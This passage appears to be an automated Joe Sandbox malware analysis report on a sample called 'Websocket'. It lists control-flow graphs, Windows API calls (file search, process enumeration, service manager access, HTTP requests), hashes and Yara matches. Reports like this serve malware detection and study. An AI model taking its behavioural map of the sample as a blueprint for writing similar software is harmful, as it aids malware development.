24355 6145d7 24354->24355 24361 6145ed 24354->24361 24374 613e40 GetPEB 24355->24374 24357 6145e1 24375 613da0 GetPEB 24357->24375 24359 614660 24359->24352 24360 614626 QueryFullProcessImageNameW 24362 614652 24360->24362 24363 61463c 24360->24363 24361->24359 24361->24360 24376 613e40 GetPEB 24361->24376 24362->24352 24378 613e40 GetPEB 24363->24378 24366 614615 24377 613da0 GetPEB 24366->24377 24367 614646 24379 613da0 GetPEB 24367->24379 24370 614621 24370->24360 24371->24352 24372->24352 24373->24350 
24374->24357 24375->24361 24376->24366 24377->24370 24378->24367 24379->24362 24622 731890 FreeLibrary 24671 40f3b0 RaiseException __CxxThrowException@8 24672 40f7b0 162 API calls __except_handler4

                                    Control-flow Graph

                                    APIs
                                    • _memset.LIBCMT ref: 0040FA8E
                                    • LoadIconW.USER32 ref: 0040FAD2
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040FADF
                                    • LoadIconW.USER32 ref: 0040FB0B
                                    • CreateThread.KERNELBASE(00000000,00000000,Function_0000ECC0,00000000,00000002,?), ref: 0040FB23
                                    • RegisterClassExW.USER32(?), ref: 0040FB42
                                    • MessageBoxW.USER32(00000000,Call to RegisterClassEx failed!,Create Process,00000000), ref: 0040FB5B
                                    • CreateWindowExW.USER32(00000000,win32app,Windows Process Manager,00CF0000,80000000,80000000,000001B8,00000258,00000000,00000000,?,00000000), ref: 0040FBA4
                                    • MessageBoxW.USER32(00000000,Call to CreateWindow failed!,Win32 Guided Tour,00000000), ref: 0040FBBC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: Load$CreateIconMessage$ClassCursorRegisterThreadWindow_memset
                                    • String ID: 0$BUTTON$Call to CreateWindow failed!$Call to RegisterClassEx failed!$Cancel$Create Process$Edit$Kill Process$Run$View All Processes$Win32 Guided Tour$Windows Process Manager$win32app
                                    • API String ID: 713769167-1192827546
                                    • Opcode ID: 952da5468408a189c14926ca3cf5cae3a85ce14d76ca3222c90a6cd4c0bb2d80
                                    • Instruction ID: d065e50bf912697da28d798f56a1b3ea1efd5d731bf56130ae663ba60a7ce2a6
                                    • Opcode Fuzzy Hash: 952da5468408a189c14926ca3cf5cae3a85ce14d76ca3222c90a6cd4c0bb2d80
                                    • Instruction Fuzzy Hash: 9A8120B1BD4300BAF220DB50DC56FDA37A8AB98F05F10842AF7017A2D0D7F969458B5E

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 22 731030-731075 LoadLibraryW GetProcAddress call 731b30 25 731077-731079 22->25 26 73107e-73108f 22->26 27 73148d-731490 25->27 28 7310a3-7310be call 731b30 26->28 29 731091-73109e SetLastError 26->29 32 7310c0-7310c2 28->32 33 7310c7-7310dc 28->33 29->27 32->27 34 7310f0-7310fd 33->34 35 7310de-7310eb SetLastError 33->35 36 731111-73111a 34->36 37 7310ff-73110c SetLastError 34->37 35->27 38 73112e-73114f 36->38 39 73111c-731129 SetLastError 36->39 37->27 40 731163-73116d 38->40 39->27 41 7311a5-7311d5 GetNativeSystemInfo call 7318d0 * 2 40->41 42 73116f-731176 40->42 53 7311d7-7311e4 SetLastError 41->53 54 7311e9-73120c call 731800 41->54 43 731186-731192 42->43 44 731178-731184 42->44 46 731195-73119b 43->46 44->46 48 7311a3 46->48 49 73119d-7311a0 46->49 48->40 49->48 53->27 56 73120e-73121f call 731800 54->56 57 73123d-731255 GetProcessHeap RtlAllocateHeap 54->57 60 731222-73122c 56->60 58 731257-731276 SetLastError 57->58 59 73127b-731291 57->59 58->27 61 731293-73129a 59->61 62 73129c 59->62 60->57 64 73122e-731238 SetLastError 60->64 63 7312a3-731300 call 731b30 61->63 62->63 68 731302 63->68 69 731307-731370 call 731800 call 731980 call 731b50 63->69 64->27 70 73147f-73148b call 7316c0 68->70 78 731372 69->78 79 731377-731388 69->79 70->27 78->70 80 7313a2-7313a5 79->80 81 73138a-7313a0 call 732090 79->81 82 7313ac-7313ba call 7321a0 80->82 81->82 87 7313c1-7313c5 call 731e80 82->87 88 7313bc 82->88 90 7313ca-7313cf 87->90 88->70 91 7313d1 90->91 92 7313d6-7313e4 call 732010 90->92 91->70 95 7313e6 92->95 96 7313eb-7313f4 92->96 95->70 97 731470-731473 96->97 98 7313f6-7313fd 96->98 99 73147a-73147d 97->99 100 7313ff-73145b GetPEB 98->100 101 73145d-73146b 98->101 99->27 102 73146e 100->102 101->102 102->99
                                    APIs
                                    • LoadLibraryW.KERNEL32(00734054,00734040), ref: 00731047
                                    • GetProcAddress.KERNEL32(00000000), ref: 0073104E
                                      • Part of subcall function 00731B30: SetLastError.KERNEL32(0000000D,?,00731070,?,00000040), ref: 00731B3D
                                    • SetLastError.KERNEL32(000000C1), ref: 00731096
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637741644.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_731000_Websocket.jbxd
                                    Similarity
                                    • API ID: ErrorLast$AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 1866314245-0
                                    • Opcode ID: 9509a99d816b47babac5a904169f67d270672e3d59b76580bac1085bbdbd1315
                                    • Instruction ID: e615c680cb785a787bd2e93cf47587405d15fa82212a8800eb6a9e786ccb4839
                                    • Opcode Fuzzy Hash: 9509a99d816b47babac5a904169f67d270672e3d59b76580bac1085bbdbd1315
                                    • Instruction Fuzzy Hash: 96F1FCB5E00209EFEB04CF94D984AAEB7B1BF48305F608558E915AB352D739EE41DB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 243 6180d0-61819c 244 6181a1-6181a7 243->244 245 6181ad 244->245 246 61826e-618274 244->246 249 6181b3-6181b9 245->249 250 618264-618269 245->250 247 618300-618307 246->247 248 61827a-618280 246->248 253 618324-618337 247->253 254 618309-61831f call 613e40 call 613da0 247->254 251 618282-618289 248->251 252 6182e9-6182ef 248->252 255 61833c-618384 call 61b400 249->255 256 6181bf-6181c5 249->256 250->244 260 6182a6-6182c9 251->260 261 61828b-6182a1 call 613e40 call 613da0 251->261 252->244 262 6182f5-6182ff 252->262 253->244 254->253 255->262 273 61838a 255->273 257 6181c7-6181cd 256->257 258 61822f-618236 256->258 257->252 264 6181d3-6181db 257->264 267 618253-61825f 258->267 268 618238-61824e call 613e40 call 613da0 258->268 286 6182e6 260->286 287 6182cb-6182e1 call 613e40 call 613da0 260->287 261->260 271 6181fb-61821f CreateFileW 264->271 272 6181dd-6181f5 call 613e40 call 613da0 264->272 267->244 268->267 271->262 282 618225-61822a 271->282 272->271 280 618394-6183a1 273->280 281 61838c-61838e 273->281 281->262 281->280 282->244 286->252 287->286
                                    APIs
                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,0100754F,00000000), ref: 00618218
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID: @1v$DR$Ou$m$.v
                                    • API String ID: 823142352-4143615534
                                    • Opcode ID: 8daf6be44b3de00673a1987c71c6c6435f5574d234eaf9a35b7b999e5a918531
                                    • Instruction ID: f1b74c4d0477e5305279413d6bd04c304a3b4ce1f699152a9111f1636913406b
                                    • Opcode Fuzzy Hash: 8daf6be44b3de00673a1987c71c6c6435f5574d234eaf9a35b7b999e5a918531
                                    • Instruction Fuzzy Hash: 3B61A132A087019FD754DF68C845AAFB6E2ABD4714F08890DF495D7390DB78CA498BC2

                                    Control-flow Graph

                                    control_flow_graph 298 6138b0-6138cb 299 6138d0-6138d5 298->299 300 613a85-613a8a 299->300 301 6138db 299->301 302 613af1-613af8 300->302 303 613a8c-613a91 300->303 304 6138e1-6138e6 301->304 305 613a7b-613a80 301->305 308 613b15-613b2b FindNextFileW 302->308 309 613afa-613b10 call 613e40 call 613da0 302->309 310 613a93-613a9a 303->310 311 613adb-613ae0 303->311 306 613b30-613b37 304->306 307 6138ec-6138f1 304->307 305->299 318 613b54-613b55 FindClose 306->318 319 613b39-613b4f call 613e40 call 613da0 306->319 312 6139d7-6139ea call 613480 307->312 313 6138f7-6138fc 307->313 308->299 309->308 316 613ab7-613acb FindFirstFileW 310->316 317 613a9c-613ab2 call 613e40 call 613da0 310->317 311->299 314 613ae6-613af0 311->314 337 613a07-613a22 312->337 338 6139ec-613a02 call 613e40 call 613da0 312->338 313->311 322 613902-613907 313->322 320 613ad1-613ad6 316->320 321 613b57-613b61 316->321 317->316 318->321 319->318 320->299 327 6139b1-6139d2 322->327 328 61390d-613913 322->328 327->299 333 613915-61391d 328->333 334 613934-613936 328->334 340 61392d-613932 333->340 341 61391f-613923 333->341 334->340 342 613938-61394b call 613480 334->342 352 613a24-613a3a call 613e40 call 613da0 337->352 353 613a3f-613a4a 337->353 338->337 340->299 341->334 349 613925-61392b 341->349 357 613968-613998 call 6138b0 342->357 358 61394d-613963 call 613e40 call 613da0 342->358 349->334 349->340 352->353 364 613a67-613a76 353->364 365 613a4c-613a62 call 613e40 call 613da0 353->365 373 61399d-6139ac call 613420 357->373 358->357 364->299 365->364 373->299
                                    APIs
                                    • FindFirstFileW.KERNELBASE(?,?,?,33A6B453,00000001,00000000), ref: 00613AC4
                                    • FindNextFileW.KERNELBASE(?,?,?,33A6B453,00000001,00000000), ref: 00613B1B
                                    • FindClose.KERNELBASE(?), ref: 00613B55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID: *LO$.
                                    • API String ID: 3541575487-2132576683
                                    • Opcode ID: 70f6ffdf43d36449ec67b17cac167a64cc42f66f9d15a8deded4e52a07b2c987
                                    • Instruction ID: 3e33dc603540513c9bc46e374b0bf59f2070cbbc6b840566a7ad50261fb7d1b6
                                    • Opcode Fuzzy Hash: 70f6ffdf43d36449ec67b17cac167a64cc42f66f9d15a8deded4e52a07b2c987
                                    • Instruction Fuzzy Hash: A75106B1B0426047CB64AB749841AFB76A79F94740F0C881FF447C7391EA75CF868752

                                    Control-flow Graph

                                    control_flow_graph 421 6125a0-6125ac 422 6125b0-6125b6 421->422 423 6127a4-6127aa 422->423 424 6125bc 422->424 425 6127b0 423->425 426 612899-61289f 423->426 427 6125c2-6125c8 424->427 428 612766-61276e 424->428 429 6127b6-6127bc 425->429 430 612848-61284f 425->430 435 6128a5-6128ac 426->435 436 6125e4-6125ea 426->436 431 6126c4-6126ca 427->431 432 6125ce 427->432 433 612770-612788 call 613e40 call 613da0 428->433 434 61278e-61279f 428->434 439 6127ee-6127f5 429->439 440 6127be-6127c4 429->440 437 612851-612867 call 613e40 call 613da0 430->437 438 61286c-61287d 430->438 441 61272a-612732 431->441 442 6126cc-6126d2 431->442 443 6125d0-6125d6 432->443 444 612646-61264d 432->444 433->434 434->422 447 6128c9-6128d9 435->447 448 6128ae-6128c4 call 613e40 call 613da0 435->448 436->422 445 6125ec-6125f3 436->445 437->438 474 612882-612894 438->474 453 612812-612843 CryptDecodeObjectEx 439->453 454 6127f7-61280d call 613e40 call 613da0 439->454 440->436 449 6127ca-6127de call 6141c0 440->449 455 612752-612761 441->455 456 612734-61274c call 613e40 call 613da0 441->456 442->436 450 6126d8-6126e0 442->450 451 6125f4-6125fb 443->451 452 6125d8-6125de 443->452 458 61266a-612680 444->458 459 61264f-612665 call 613e40 call 613da0 444->459 447->422 448->447 449->445 490 6127e4-6127e9 449->490 465 612700-612713 450->465 466 6126e2-6126fa call 613e40 call 613da0 450->466 468 612618-61262c 451->468 469 6125fd-612613 call 613e40 call 613da0 451->469 452->436 467 6128de-6128f0 call 614120 452->467 453->422 454->453 455->422 456->455 486 612685-61269c 458->486 459->458 493 612718-61271a 465->493 466->465 495 61262f-612641 468->495 469->468 474->422 499 6126b9-6126bf 486->499 500 61269e-6126b4 call 613e40 call 613da0 486->500 490->422 504 6128f1-6128fb 493->504 505 612720-612725 493->505 495->422 499->436 500->499 505->422
                                    APIs
                                    • CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?,?), ref: 0061282F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CryptDecodeObject
                                    • String ID: =t$=t
                                    • API String ID: 1207547050-3586649727
                                    • Opcode ID: bd75d7b808dc285b133c541a8bdda49259c67dd08f7f0eb9d1f215ba852772d5
                                    • Instruction ID: d45530a260f897e640b3db61fa746f7c4ff335afc8fa19c11a46701aa3468505
                                    • Opcode Fuzzy Hash: bd75d7b808dc285b133c541a8bdda49259c67dd08f7f0eb9d1f215ba852772d5
                                    • Instruction Fuzzy Hash: 57710D71B002225BDB54AB68DCA6BEA76536B94700F0D802EFD46DF3A0EA21DCD187C5

                                    Control-flow Graph

                                    control_flow_graph 727 6152e0-6152ee 728 6152f0-6152f5 727->728 729 615382-615387 728->729 730 6152fb 728->730 731 6153e1-6153f0 729->731 732 615389-61538e 729->732 733 615378-61537d 730->733 734 6152fd-615302 730->734 731->728 735 615390-615395 732->735 736 6153f5-615403 732->736 733->728 737 615304-615309 734->737 738 61535e-615373 734->738 739 615397-61539e 735->739 740 6153cc-6153d1 735->740 741 615350-61535c 737->741 742 61530b-615310 737->742 738->728 743 6153a0-6153b6 call 613e40 call 613da0 739->743 744 6153bb-6153c7 GetNativeSystemInfo 739->744 740->728 746 6153d7-6153e0 740->746 741->728 742->740 745 615316-615325 742->745 743->744 744->728 748 615342-61534e 745->748 749 615327-61533d call 613e40 call 613da0 745->749 748->728 749->748
                                    APIs
                                    • GetNativeSystemInfo.KERNELBASE(33A6B453,33A6B453), ref: 006153C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoNativeSystem
                                    • String ID: 5sF$5sF
                                    • API String ID: 1721193555-3318035110
                                    • Opcode ID: 3c361d5d48ee2b70d86ceb0d3beb8b1871d67246965052e6b8acf70f91ded45d
                                    • Instruction ID: cfd969a01ca7cd37c02b4fbe947eb5db7af8f71d02253723da4e2be1f0590a97
                                    • Opcode Fuzzy Hash: 3c361d5d48ee2b70d86ceb0d3beb8b1871d67246965052e6b8acf70f91ded45d
                                    • Instruction Fuzzy Hash: 8821D472A00650CBCB68866899816EEF6D39BC4384F5C552BF567CB360F678CEC15387

                                    Control-flow Graph

                                    control_flow_graph 107 612b60-612b94 108 612b98-612b9c 107->108 109 612ba0-612ba6 108->109 110 612d4d-612d53 109->110 111 612bac 109->111 112 612e94-612e9a 110->112 113 612d59 110->113 114 612bb2-612bb8 111->114 115 612cf7-612cf9 111->115 118 612ed5-612ed7 112->118 119 612e9c-612ea2 112->119 120 612de9-612df0 113->120 121 612d5f-612d65 113->121 122 612c66-612c6c 114->122 123 612bbe 114->123 116 612d03-612d05 115->116 117 612cfb-612d01 115->117 126 612d07-612d0e 116->126 117->126 124 612ed9-612ee9 call 613480 118->124 125 612eeb 118->125 129 612e83-612e89 119->129 130 612ea4-612eab 119->130 135 612df2-612e08 call 613e40 call 613da0 120->135 136 612e0d-612e35 InternetOpenW 120->136 131 612d67-612d6d 121->131 132 612ddf-612de4 121->132 127 612cd0-612ce9 call 612900 122->127 128 612c6e-612c74 122->128 133 612f94-612f9b 123->133 134 612bc4-612bca 123->134 141 612eef-612ef6 124->141 125->141 139 612d10-612d26 call 613e40 call 613da0 126->139 140 612d2b-612d48 HttpSendRequestW 126->140 180 612ced-612cf2 127->180 128->129 145 612c7a-612c81 128->145 146 612e8f 129->146 147 612fbe-612fc9 129->147 148 612ec8-612ed0 InternetCloseHandle 130->148 149 612ead-612ec3 call 613e40 call 613da0 130->149 131->129 144 612d73-612d89 call 6141c0 131->144 132->109 153 612fb8 133->153 154 612f9d-612fb3 call 613e40 call 613da0 133->154 151 612c06-612c15 134->151 152 612bcc-612bd2 134->152 135->136 142 612e52-612e5d 136->142 143 612e37-612e4d call 613e40 call 613da0 136->143 139->140 140->108 158 612f13-612f31 141->158 159 612ef8-612f0e call 613e40 call 613da0 141->159 191 612e7a-612e80 142->191 192 612e5f-612e75 call 613e40 call 613da0 142->192 143->142 194 612dd5-612dda 144->194 195 612d8b-612d92 144->195 164 612c83-612c99 call 613e40 call 613da0 145->164 165 612c9e-612ccb InternetConnectW 145->165 146->108 148->109 149->148 161 612c32-612c48 151->161 162 612c17-612c2d call 613e40 call 613da0 151->162 152->129 168 612bd8-612bdf 152->168 153->147 154->153 205 612f33-612f49 call 613e40 call 613da0 158->205 206 612f4e-612f59 158->206 159->158 161->180 208 612c4e-612c56 161->208 162->161 164->165 165->109 181 612be1-612bf7 call 613e40 call 613da0 168->181 182 612bfc-612c04 168->182 180->109 181->182 182->109 191->129 192->191 194->109 209 612d94-612daa call 613e40 call 613da0 195->209 210 612daf-612dbb ObtainUserAgentString 195->210 205->206 233 612f76-612f8f 206->233 234 612f5b-612f71 call 613e40 call 613da0 206->234 208->180 218 612c5c-612c61 208->218 209->210 220 612dbd-612dca call 615620 210->220 221 612dce-612dd0 call 614120 210->221 218->109 220->221 221->194 233->109 234->233
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00612CB4
                                    • HttpSendRequestW.WININET(00000000,?,000000FF,00000000,00000000), ref: 00612D34
                                    • ObtainUserAgentString.URLMON(00000000,00000000,00000200), ref: 00612DB7
                                    • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00612E19
                                    • InternetCloseHandle.WININET(?), ref: 00612EC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$AgentCloseConnectHandleHttpObtainOpenRequestSendStringUser
                                    • String ID: 'aR
                                    • API String ID: 1741791824-1895538066
                                    • Opcode ID: 860bacdee53bdf97e4bfc17b82b5eb497c59e064d185f9ac85d0c77df9b88045
                                    • Instruction ID: 8e2e54b4294c2f8b4c886945227f95a068d2d7f983647ab479f808cbfc4ffeac
                                    • Opcode Fuzzy Hash: 860bacdee53bdf97e4bfc17b82b5eb497c59e064d185f9ac85d0c77df9b88045
                                    • Instruction Fuzzy Hash: 76B1E330A043124BDB54AF659C617EAB6E7AFC8700F5C482EF956DB3A0EA70CD9187C5

                                    Control-flow Graph

                                    control_flow_graph 379 614b90-614ba6 380 614bb0-614bb5 379->380 381 614c75-614c7a 380->381 382 614bbb 380->382 385 614c7c-614c81 381->385 386 614cbe-614cc3 381->386 383 614bbd-614bc2 382->383 384 614c2e-614c3d 382->384 389 614cc8-614ccf 383->389 390 614bc8-614bcd 383->390 387 614c5a-614c70 Process32FirstW 384->387 388 614c3f-614c55 call 613e40 call 613da0 384->388 391 614c83-614c8a 385->391 392 614ca9-614cae 385->392 386->380 387->380 388->387 396 614cd1-614ce7 call 613e40 call 613da0 389->396 397 614cec-614ced FindCloseChangeNotification 389->397 398 614c16-614c2c 390->398 399 614bcf-614bd4 390->399 391->387 393 614c8c-614ca7 call 613e40 call 613da0 391->393 392->380 394 614cb4-614cbd 392->394 393->387 396->397 404 614cef-614cf8 397->404 398->380 399->392 403 614bda-614be1 399->403 409 614be3-614bf9 call 613e40 call 613da0 403->409 410 614bfe-614c09 CreateToolhelp32Snapshot 403->410 409->410 410->404 411 614c0f-614c14 410->411 411->380
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00614C02
                                    • Process32FirstW.KERNEL32(?,0000022C), ref: 00614C60
                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?), ref: 00614CED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32
                                    • String ID: @UJ)$.v
                                    • API String ID: 692674288-3001562398
                                    • Opcode ID: 93fab4b0329c7f86d1acd158facd3a1826d1d1c2ea7203a3150073a857f33c43
                                    • Instruction ID: 4c161251708126898c93b84d320cbb5e798c5366a9a25ffae6e2b0f51e23f35c
                                    • Opcode Fuzzy Hash: 93fab4b0329c7f86d1acd158facd3a1826d1d1c2ea7203a3150073a857f33c43
                                    • Instruction Fuzzy Hash: C4313F71B1431157D7645AB8AC966FE32D79B80710B1C841BF816DB390ED38CDC687D1

                                    Control-flow Graph

                                    control_flow_graph 516 619530-619548 517 619550-619555 516->517 518 6196f4-6196f9 517->518 519 61955b 517->519 520 6197c7-6197cc 518->520 521 6196ff 518->521 522 619561-619566 519->522 523 61967d-619684 519->523 524 619580-619585 520->524 525 6197d2-6197f7 520->525 528 619701-619706 521->528 529 619773-61977a 521->529 530 619614-619619 522->530 531 61956c 522->531 526 6196a1-6196ac 523->526 527 619686-61969c call 613e40 call 613da0 523->527 524->517 532 619587-619593 524->532 525->517 553 6196c9-6196da 526->553 554 6196ae-6196c4 call 613e40 call 613da0 526->554 527->526 535 619722-619729 528->535 536 619708-61970d 528->536 537 619797-6197a6 OpenSCManagerW 529->537 538 61977c-619792 call 613e40 call 613da0 529->538 530->524 533 61961f-619678 530->533 539 6195e3-6195ea 531->539 540 61956e-619573 531->540 533->517 543 619746-61976e call 613c80 535->543 544 61972b-619741 call 613e40 call 613da0 535->544 536->524 548 619713-61971d call 617950 536->548 545 6197a8-6197b8 537->545 546 6197bd-6197c2 537->546 538->537 550 619607-61960f 539->550 551 6195ec-619602 call 613e40 call 613da0 539->551 541 619575-61957a 540->541 542 619594-61959c 540->542 541->524 555 6197fc-619803 541->555 557 6195bc-6195d0 542->557 558 61959e-6195b6 call 613e40 call 613da0 542->558 543->517 544->543 545->517 546->517 548->517 550->517 551->550 587 6196e0-6196ef 553->587 588 619848-619854 553->588 554->553 567 619820-61982b 555->567 568 619805-61981b call 613e40 call 613da0 555->568 582 6195d4-6195de 557->582 558->557 591 61982f-619845 call 613000 567->591 568->567 582->517 587->517 591->588
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,33A6B453,?,?), ref: 006197A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ManagerOpen
                                    • String ID: p^6w$y7@+
                                    • API String ID: 1889721586-3557144604
                                    • Opcode ID: 2f80413df1c524e5ab51c22356e848ec4d8529ca363f28f136bda6e15b75c5da
                                    • Instruction ID: 49e09286e40e7d4b52b9e2b6658c01c9a2fd456c07814ee67471228fd3742618
                                    • Opcode Fuzzy Hash: 2f80413df1c524e5ab51c22356e848ec4d8529ca363f28f136bda6e15b75c5da
                                    • Instruction Fuzzy Hash: 2671A3707043019BD758DF38A9657EB76A7AB90B00F1C482EF146DB391EA30DD89C7A6

                                    Control-flow Graph

                                    control_flow_graph 598 619860-619876 599 619880-619885 598->599 600 61988b 599->600 601 6199be-6199c3 599->601 602 619891-619896 600->602 603 6199b4-6199b9 600->603 604 619a54-619a5b 601->604 605 6199c9-6199ce 601->605 606 61995a-619970 602->606 607 61989c-6198a1 602->607 603->599 608 619a78 604->608 609 619a5d-619a73 call 613e40 call 613da0 604->609 610 6199d0-6199d7 605->610 611 619a3c-619a41 605->611 613 619972-619988 call 613e40 call 613da0 606->613 614 61998d-61999e 606->614 615 619920-619927 call 619a90 607->615 616 6198a3-6198a8 607->616 625 619a7b-619a85 608->625 609->608 618 6199f4-619a09 610->618 619 6199d9-6199ef call 613e40 call 613da0 610->619 611->599 612 619a47-619a51 611->612 613->614 614->625 643 6199a4-6199af 614->643 640 619929-619930 615->640 641 6198e8-6198ef 615->641 616->611 622 6198ae-6198b5 616->622 638 619a26-619a37 618->638 639 619a0b-619a21 call 613e40 call 613da0 618->639 619->618 628 6198d2-6198df FindFirstChangeNotificationW call 619a90 622->628 629 6198b7-6198cd call 613e40 call 613da0 622->629 650 6198e4-6198e6 628->650 629->628 638->599 639->638 648 619932-619948 call 613e40 call 613da0 640->648 649 61994d 640->649 651 6198f1-619907 call 613e40 call 613da0 641->651 652 61990c-61991b 641->652 643->599 648->649 656 619950-619955 649->656 650->641 650->656 651->652 652->599 656->599
                                    APIs
                                    • FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 006198DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeFindFirstNotification
                                    • String ID: Ma:$Ma:
                                    • API String ID: 1065410024-930586552
                                    • Opcode ID: cdb0ab4be74b081fc242a6d8bb531fcfca3e7019507579728da780b479ebc805
                                    • Instruction ID: 9c9937a3955bf0c5794b9536f45e1f9d6e905c08653cfd3522dba7bb3295c9e2
                                    • Opcode Fuzzy Hash: cdb0ab4be74b081fc242a6d8bb531fcfca3e7019507579728da780b479ebc805
                                    • Instruction Fuzzy Hash: 8A418770B003109BDB98EF7558616FA3697AF94700B0C482FF556CB390EA34CD8597A6

                                    Control-flow Graph

